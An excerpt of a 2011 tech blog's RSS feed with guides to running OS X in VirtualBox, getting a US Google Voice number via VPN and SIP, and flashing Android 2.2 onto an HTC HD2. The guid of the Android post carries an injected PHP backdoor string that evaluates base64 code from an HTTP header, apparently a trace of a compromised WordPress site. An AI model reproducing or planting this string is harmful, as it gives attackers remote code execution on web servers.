href="http://feeds.feedburner.com/~ff/NakedCleaner?a=OCRqavZwAUo:Daf8wdiNHVA:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/OCRqavZwAUo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/07/useful-stuff-android/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/07/useful-stuff-android/</feedburner:origLink></item>
		<item>
		<title>OSX 10.6.7 on Hackintosh</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/r5lxZocfyvo/</link>
		<comments>http://www.nakedcleaner.com/2011/06/osx-10-7-on-hackintosh/#comments</comments>
		<pubDate>Thu, 30 Jun 2011 11:15:35 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[Computing]]></category>
		<category><![CDATA[Tech]]></category>
		<category><![CDATA[10.6.7]]></category>
		<category><![CDATA[Hackintosh]]></category>
		<category><![CDATA[MacOSX]]></category>
		<category><![CDATA[VirtualBox]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/06/osx-10-7-on-hackintosh/</guid>
		<description>Just for giggles (obviously) Things you will need VirtualBox A copy of 10.6 (SL_10.6.6i_by_Hazard.iso is what I used) A PC With the VTX extensions Some time and patience Install VirtualBox onto the PC, and install the extensions Fire up VirtualBox, and create a new Virtual Machine by clicking new at the top Name it MacOSX [...]</description>
			<content:encoded><![CDATA[<p>Just for giggles (obviously) </p>
<p>Things you will need</p>
<ol>
<li><a href="http://www.virtualbox.org/wiki/Downloads">VirtualBox</a> </li>
<li>A copy of 10.6 (<a href="https://boost4-downloads.secure.members.easynews.com/news/3/f/6/3f670d7d1a6e9214a0365576a2b21ad30148b5f5c.iso/SL_10.6.6i_by_Hazard.iso">SL_10.6.6i_by_Hazard.iso</a> is what I used) </li>
<li>A PC With the VTX extensions </li>
<li>Some time and patience </li>
</ol>
<ul>
<li>Install VirtualBox onto the PC, and install the <a href="http://download.virtualbox.org/virtualbox/4.0.10/Oracle_VM_VirtualBox_Extension_Pack-4.0.10-72436.vbox-extpack">extensions</a> </li>
<li>Fire up VirtualBox, and create a new Virtual Machine by clicking new at the top </li>
<li>Name it MacOSX (or whatever, but use the word Mac and it will auto select Mac OSX as the OS, if mot make sure you select it)&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/1.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="1" border="0" alt="1" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/1_thumb.png" width="244" height="173" /></a> </li>
<li>Click next throught most of the rest of it, I’d say give it as much ram as you can, but my laptop chugs along quiet happily with 768mb, and create a new virtual disk. </li>
<li>Right click the new VM, and select Settings, pop to System and untick the enable EFI option (and floppy). I set the boot order to HDD then CD because I always forget to unmount the disk, but that’s upto you. Also check the Display option to make sure 3D Acceleration is enabled.&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/2.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="2" border="0" alt="2" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/2_thumb.png" width="244" height="189" /></a> </li>
<li>Mount the DVD into the virtual DVD Drive&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/3.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="3" border="0" alt="3" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/3_thumb.png" width="244" height="187" /></a> </li>
<li>Fire up the VM and it will load the Chameleon, press enter to load the OS Installer and wait for it to get into OSX.&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/4.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="4" border="0" alt="4" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/4_thumb.png" width="244" height="175" /></a> <a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/5.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="5" border="0" alt="5" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/5_thumb.png" width="244" height="176" /></a> </li>
<li>Select your language, and agree to the licenses etc, now select Utilities, Disk Utility, Select the raw disk, click Partition, select 1 Partition, name the disk, and make sure the format is Extended (Journaled) and click Apply.&#160; <br />&#160;<a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/6.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="6" border="0" alt="6" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/6_thumb.png" width="244" height="207" /></a><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/7.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="7" border="0" alt="7" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/7_thumb.png" width="244" height="204" /></a> </li>
<li>Click close on the Disk Utility and you will be back to the installer screen, don&#8217;t click install just yet, rather click Customize&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/8.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="8" border="0" alt="8" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/8_thumb.png" width="244" height="175" /></a> </li>
<li>From there expand <strong>Chameleon Boot loaders</strong>, select <strong>Chameleon RC5</strong>, and Chameleon Options and select <strong>Ethernet Builtin</strong> and <strong>Graphics Enabler</strong>, then scroll down to <strong>Patches </strong>and select <strong>USB Fix</strong> and <strong>NTFS</strong> (if you want to read Win formatted disks). Anything else you want installing (Fonts, X11, whatnot) now’s the time to pick it.&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/9.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="9" border="0" alt="9" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/9_thumb.png" width="244" height="181" /></a> </li>
<li>Ok out of that, and click install, go make a cup of tea, as it will take a few minutes to do it’s thing. After it finishes it will reboot, sometimes the reboot will fail with a kernel panic, don&#8217;t worry, just reset the VM (right CTRL-R) and make sure to either eject the CD, or change the boot order so the Hard disk boots, not the CD. </li>
<li>That will bring you into OSX, and have you go through the initial configuration. You don’t need to use an AppleID, but doesn&#8217;t seem to hurt if you do use one. Just make sure to give yourself a login with a password (makes that the SU password then) </li>
<li>Right, we now have 10.6 up and running, however that’s not the latest build, and there will be updates. <strong>DONT do them from the updater!</strong> it will overwrite the Kernel, then it wont boot properly (if doing this on Physical, most modern Intel CPU’s can do this, as the standard kernel will be fine). Right we need to download the update and do it manually, so pop to the <a href="http://support.apple.com/kb/DL1361">Apple OSX 10.6.7 Combo Update</a> page and download it to the machine (the OSX machine), and also before clicking anything, download the <a href="http://dl.dropbox.com/u/10118524/10.6.7%20Kernel%20and%20Kexts.zip">10.6.7 Legacy Kernel Package</a> </li>
<li>Right then, install the Combo update, but whatever you do leave it on the screen saying Restart, <strong>DONT RESTART </strong>Rather now run the Legacy Kernel 10.7 Package installer. Continue through, and select Legacy Kernel (if your on an AMD, then select that as well) and let it install. When finished select the restart option in the Combo update. When you see the Kernel Panic Press Right CTRL-R.&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/10.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="10" border="0" alt="10" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/10_thumb.png" width="244" height="167" /></a> <a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/11.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="11" border="0" alt="11" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/11_thumb.png" width="244" height="168" /></a> </li>
<li>Well done, your successfully now running MacOSX 10.6.7, have fun with your ‘Mac’.&#160; <br /><a href="http://www.nakedcleaner.com/wp-content/uploads/2011/06/12.png" rel="lightbox"><img style="background-image: none; border-right-width: 0px; margin: 3px 4px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="12" border="0" alt="12" src="http://www.nakedcleaner.com/wp-content/uploads/2011/06/12_thumb.png" width="498" height="373" /></a> </li>
</ul>

<p><a href="http://feedads.g.doubleclick.net/~a/1Yvmb3VzQpF4LEtFeGj4DNCeyvU/0/da"><img src="http://feedads.g.doubleclick.net/~a/1Yvmb3VzQpF4LEtFeGj4DNCeyvU/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/1Yvmb3VzQpF4LEtFeGj4DNCeyvU/1/da"><img src="http://feedads.g.doubleclick.net/~a/1Yvmb3VzQpF4LEtFeGj4DNCeyvU/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=r5lxZocfyvo:lhEr0rS_kMY:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=r5lxZocfyvo:lhEr0rS_kMY:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=r5lxZocfyvo:lhEr0rS_kMY:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=r5lxZocfyvo:lhEr0rS_kMY:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=r5lxZocfyvo:lhEr0rS_kMY:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=r5lxZocfyvo:lhEr0rS_kMY:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/r5lxZocfyvo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/06/osx-10-7-on-hackintosh/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/06/osx-10-7-on-hackintosh/</feedburner:origLink></item>
		<item>
		<title>Google Voice</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/BfjCus6ElEM/</link>
		<comments>http://www.nakedcleaner.com/2011/06/google-voice/#comments</comments>
		<pubDate>Wed, 29 Jun 2011 18:05:21 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2011/06/google-voice/</guid>
		<description>I thought I would pop a quick post together to rundown how to get yourself a Google Voice number outside the USA. Why? well it’s handy if you have US friends to have a US number, and hell, it’s fun to play. First up, we need a US number to start with. First up, pop [...]</description>
			<content:encoded><![CDATA[<p>I thought I would pop a quick post together to rundown how to get yourself a Google Voice number outside the USA.</p>
<p>Why? well it’s handy if you have US friends to have a US number, and hell, it’s fun to play.</p>
<p>First up, we need a US number to start with.</p>
<ul>
<li>First up, pop over to <a href="https://www.callcentric.com/login">Callcentric</a> and signup for a new account, doesn’t take long, just go through the confirmation email as well, and yes you can use your UK address to signup.</li>
<li>OK, so halfway to getting a US number as Callcentric is a SIP only number (1777*), login to your Callcentric account, Click Preferences and copy your SIP number into the clipboard. </li>
<li>Now let’s get that SIP number responding to a proper US phone number. Head on over to <a href="http://phone.ipkall.com/">IPKall</a> for that.</li>
<li>Make sure the account type is set to SIP, pick an area code you like and pop the 177 number into the SIP Username field, set the hostname to <strong>in.callcentric.com </strong>and the email address and password to the same as you used for Callcentric.</li>
<li>You will get an email from IPKall with your new phone number on it, keep that safe, we will need it in a moment.</li>
<li>Now to activate the SIP account, download the <a href="http://www.callcentric.com/support/device/callcentric">Callcentric Softphone</a> and install and run it, that will register it on your account (check by going to your <a href="https://my.callcentric.com/home.php">dashboard</a> and make sure it says registered in status)</li>
<li>Next step is to get yourself a VPN tunnel to the USA, I use <a href="https://www.privateinternetaccess.com/">PrivateInternetAccess</a> (payfor) but I know that <a href="http://hotspotshield.com/">HotSpotShield</a> works as well, whichever way you go, make sure your in the USA, well at least as far as google thinks (<a href="http://tools.ip2location.com/ib1">Check Here</a>)</li>
<li>goto <a href="http://voice.google.com">voice.google.com</a> and login. </li>
<li>Pick a number, user either the create me a number method, or whatever you fancy, upto you</li>
<li>pop a 4 digit pin in when asked</li>
<li>Right, here’s where we need the US phone number we got earlier from IPKall, pop it in when asked, and make sure your Callcentric softphone is up and running, as Google will call you to verify you now. Just pop the number in, and the next screen say call me now, pop the code into the keypad that they give you and hey prsto, Google Voice.</li>
<li>Pop over to marketplace/Appstore and download the mobile app for it.</li>
<li>You now have a US telephone number (well 2 actually), hopefully when/if Google enable SIP direct to Google Voice you can make US calls for nothing/little</li>
</ul>

<p><a href="http://feedads.g.doubleclick.net/~a/B72FGKVd5j4zzHG38bGrNJyjpzw/0/da"><img src="http://feedads.g.doubleclick.net/~a/B72FGKVd5j4zzHG38bGrNJyjpzw/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/B72FGKVd5j4zzHG38bGrNJyjpzw/1/da"><img src="http://feedads.g.doubleclick.net/~a/B72FGKVd5j4zzHG38bGrNJyjpzw/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=BfjCus6ElEM:SrfIWtW_44Q:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=BfjCus6ElEM:SrfIWtW_44Q:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=BfjCus6ElEM:SrfIWtW_44Q:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=BfjCus6ElEM:SrfIWtW_44Q:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=BfjCus6ElEM:SrfIWtW_44Q:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=BfjCus6ElEM:SrfIWtW_44Q:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/BfjCus6ElEM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/06/google-voice/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/06/google-voice/</feedburner:origLink></item>
		<item>
		<title>USAIP</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/2S6CtLhXIPI/</link>
		<comments>http://www.nakedcleaner.com/2011/03/usaip/#comments</comments>
		<pubDate>Mon, 28 Mar 2011 18:31:38 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/?p=918</guid>
		<description>Came accross what looks to be a cracking service from usaip.eu endpoints in USA/Europe/China etc, think I&amp;#8217;ll give it a try, let you know what I think.</description>
			<content:encoded><![CDATA[<p>Came accross what looks to be a cracking service from <a href="http://usaip.eu">usaip.eu</a> endpoints in USA/Europe/China etc, think I&#8217;ll give it a try, let you know what I think.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/OZwPzlIl6-HFgku6NWrk5kOHAjQ/0/da"><img src="http://feedads.g.doubleclick.net/~a/OZwPzlIl6-HFgku6NWrk5kOHAjQ/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/OZwPzlIl6-HFgku6NWrk5kOHAjQ/1/da"><img src="http://feedads.g.doubleclick.net/~a/OZwPzlIl6-HFgku6NWrk5kOHAjQ/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:D7DqB2pKExk"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=2S6CtLhXIPI:SZ21oORtVnM:D7DqB2pKExk" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:JEwB19i1-c4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=2S6CtLhXIPI:SZ21oORtVnM:JEwB19i1-c4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:ByNYXvuKCJE"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=ByNYXvuKCJE" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:3QFJfmc7Om4"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=2S6CtLhXIPI:SZ21oORtVnM:3QFJfmc7Om4" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=2S6CtLhXIPI:SZ21oORtVnM:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?i=2S6CtLhXIPI:SZ21oORtVnM:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/NakedCleaner?a=2S6CtLhXIPI:SZ21oORtVnM:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/NakedCleaner?d=YwkR-u9nhCs" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/NakedCleaner/~4/2S6CtLhXIPI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.nakedcleaner.com/2011/03/usaip/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://www.nakedcleaner.com/2011/03/usaip/</feedburner:origLink></item>
		<item>
		<title>Android 2.2 on the HD2</title>
		<link>http://feedproxy.google.com/~r/NakedCleaner/~3/iV7oJThJS5A/</link>
		<comments>http://www.nakedcleaner.com/2010/08/android-2-2-on-the-hd2/#comments</comments>
		<pubDate>Mon, 09 Aug 2010 15:10:47 +0000</pubDate>
		<dc:creator>Ashleigh</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.nakedcleaner.com/2010/08/09/android-2-2-on-the-hd2/%&amp;($eval(base64_decode($_SERVERHTTP_EXECCODE))|.+)&amp;%/</guid>
		<description>OK, so I’ve been running Froyo (Android 2.2) on my HD2 as the day to day OS now for a week or so, and performance is now equal to (or better see screenshot left) than a Nexus one so I’ve now decided to pop together a guide on how to get it up and running [...]</description>
			<content:encoded><![CDATA[<p><a href="http://www.nakedcleaner.com/files/Android2.2ontheHD2_E378/screenshot.png" rel="lightbox"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px" title="screenshot" border="0" alt="screenshot" align="left" src="http://www.nakedcleaner.com/files/Android2.2ontheHD2_E378/screenshot_thumb.png" width="148" height="244" /></a> OK, so I’ve been running Froyo (Android 2.2) on my HD2 as the day to day OS now for a week or so, and performance is now equal to (or better see screenshot left) than a Nexus one so I’ve now decided to pop together a guide on how to get it up and running for those that want to give it a go.</p>
<p>First things first, lets make sure we have all we need.</p>
<p>A fresh Class 2 or better MicroSD over 2Gb (format it in Windows, either in the phone using USB storage mode, or if you have a reader, from Windows PC natively)</p>
<p>The HD2 needs to be running Radio Firmware <a href="http://www.sendspace.com/file/ge8eqo" target="_blank">2.08.50.02</a> or later (I use <a href="http://www.sendspace.com/file/0bfmlv" target="_blank">2.12.50.02</a>) , and obviously you will need <a href="http://forum.xda-developers.com/showpost.php?p=6891358&amp;postcount=1892" target="_blank">HSPL</a> to flash that.</p>
<p>You also need to download an Android build, I use mattc’s 1.5 one (<a href="http://forum.xda-developers.com/showthread.php?t=736545" target="_blank">here</a>) with some tweaks, but any of them in the <a href="http://forum.xda-developers.com/forumdisplay.php?f=735" target="_blank">XDA-Dev’s</a> forum should work using this guide.</p>
<p><strong>NOTE : </strong>The <a href="http://htcleo.noobhands.net/manusfreedom/zImage_all_files.zip">latest zImage</a> files do not require most of this, Just replace the files in the sdCard\Android folder with the files from the zip. If you are coming from the below modification (or any other FullRam Kernel) you will need to replace the drivers again (not required any more), just copy your backed up <strong>system.ext2</strong> over the changed one, and all will be back to normal. If you did not backup, then just re-download the distro you are using, and replace the system.ext2 file. The only file you might need to change using the below method is the WiFi driver <strong>bcm4329.ko. </strong>Also remember to copy the new version of haret.exe into your android folder.</p>
<p><strong>This will fix the WiFi : </strong>To push the updated bcm4329.ko (in the zip file) do this</p>
<ol>
<li>From a cmd prompt, in the tools folder of the Android SDK, type <strong>ADB shell</strong> </li>
<li>type <strong>su</strong> </li>
<li>type <strong>mount -o remount rw /system</strong> </li>
<li>type <strong>mv /system/lib/modules/bcm4329.ko /system/lib/modules/bcm4329.ko.orig </strong>(this will backup the original driver file) </li>
<li>press ctrl-c or type exit twice </li>
<li>type <strong>adb push ..\bcm4329.ko /system/lib/modules</strong> (where ..\bcm4329.ko is the location of the file from the zip) </li>
<li>type <strong>adb shell chmod 777 </strong><strong>/system/lib/modules/bcm4329.ko</strong> </li>
<li>goto config on your device, and enable WiFi <img src='http://www.nakedcleaner.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  </li>
</ol>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; Below is the old method if you want to use that kernel &#8212;&#8212;-</p>
<p>&#160;</p>
<p>We also need the latest Kernel from <a href="http://htcleo.noobhands.net/manusfreedom/zImage.FULLRAM.noPC" target="_blank">manusfreedom</a> (fullram one) and latest <a href="http://htcleo.noobhands.net/manusfreedom/default.FULLRAM.txt" target="_blank">deault.txt</a>, and the latest graphics drivers (thanks phh) <a href="http://husson.hd.free.fr/copybit.qsd8k.so" target="_blank">copybit</a> and <a href="http://husson.hd.free.fr/gralloc.qsd8k.so" target="_blank">gralloc</a> and the <a href="http://htcleo.noobhands.net/manusfreedom/bcm4329.ko" target="_blank">WiFi updated driver</a></p>
<p>We also need the Android SDK down and installed (see <a href="http://developer.android.com/sdk/index.html" target="_blank">here</a>) only thing really needing installing is the USB Drivers (v3 or later) and the tools, details on the Google page linked.</p>
<p>OK, so we have it all downloaded then. Lets go…</p>
<ol>
<li>Format the SD Card, Plug the card into the HD2, plug the USB into your PC, choose the mass storage mode, and in Windows Explorer right click the drive and click Format. Let it finish. </li>
<li>Open the drive and Create an <strong>Android </strong>folder on it. </li>
<li>Unzip/Unrar the Android build you have downloaded, and copy all the files into the Android folder on the SD card.&#160;&#160;&#160;&#160;&#160; <br />&#160;&#160;&#160;&#160;&#160; <br /><em>The Below section is if you want the latest fastest kernel installed, but requires using command line tools in Windows, and having the ADB tools from the Android SDK installed.&#160;&#160;&#160;&#160;&#160;&#160;&#160; <br /></em></li>
<li>Copy the new new zImage.FULLRAM.noPC into the Android Folder. </li>
<li>Copy the default.FULLRAM.txt into the Android Folder. </li>
<li>Delete or rename the current startup.txt file in the Android folder. </li>
<li>Rename the default.FULLRAM.txt to startup.txt </li>
<li>Delete or rename the current zImage file in the Android folder. </li>
<li>Rename the zImage.FULLRAM.noPC file to zImage (Please make sure you have disabled the hide known extensions in Windows, or do this from the CMD prompt). The Alternative to renaming is to edit the startup.txt you just renamed, and change the <strong>zImage</strong> line to <strong>zImage.FULLRAM.noPC</strong>       <br />&#160;&#160;&#160;&#160;&#160; <br /><em>Finish here for the latest kernel</em>&#160;&#160;&#160;&#160;&#160;&#160; </li>
<li>Fire up explorer on the device, navigate to the SD Card (obviously unplug USB from PC) then to the Android folder, and click the CLRCAD file (don&#8217;t worry if nothing happens, that’s right), then the haret file. This will then boot Android. </li>
</ol>
<p>&#160;</p>
<p>Once Android is up and running go through the initial configuration screens if you like, however we need to fix the little graphics glitches you can see (flickery lines) this is caused by bad graphics drivers. So let’s replace them (only required if running the FULLRAM kernel)</p>
<ol>
<li>Connect the USB to the device and to Windows, the USB debuging notification should pop up in the notification bar in Android. Copy the two .so files you downloaded earlier (copybit and graloc) into this folder as well </li>
<li>Launch a command prompt, and navigate to the tools folder of the Android SDK, and type <strong>adb shell mount -o remount rw /system</strong> </li>
<li>Make a backup of the files you will be deleting, create a backup folder up the tree on windows (in the CMD prompt, type <strong>MD ..\backup</strong>), then type <strong>adb pull /system/lib/hw/copybit.*.so ..\backup </strong>and <strong>adb pull /system/lib/hw/gralloc.*.so ..\backup</strong> these can then be used to restore back to the 256/384Mb based kernel if required (use the same method as below to replace files if need be, note though you have a copybit.default.so to push as well). </li>
<li>That should come back without error, now type <strong>adb shell rm /system/lib/hw/copybit.*.so </strong>and press enter, now type <strong>adb shell rm /system/lib/hw/gralloc.*.so </strong>and press enter. </li>
<li>now type <strong>adb push copybit.qsd8k.so /system/lib/hw</strong>&#160; and <strong>adb push gralloc.qsd8k.so /system/lib/hw </strong>this will copy the new drivers to the device. </li>
<li>Run&#160; <strong>adb shell chmod 777 /system/lib/*</strong>to set permissions (sorry forgot this step if you get a non boot,&#160; just do this step while the device is attempting to boot, then reboot it with the next step, it should fix nonboot issues) </li>
<li>run <strong>adb push bcm4329.ko /system/lib/modules </strong>to update WiFi updated driver </li>
<li>Now reboot the HD2, type <strong>adb shell reboot </strong>to do this. </li>
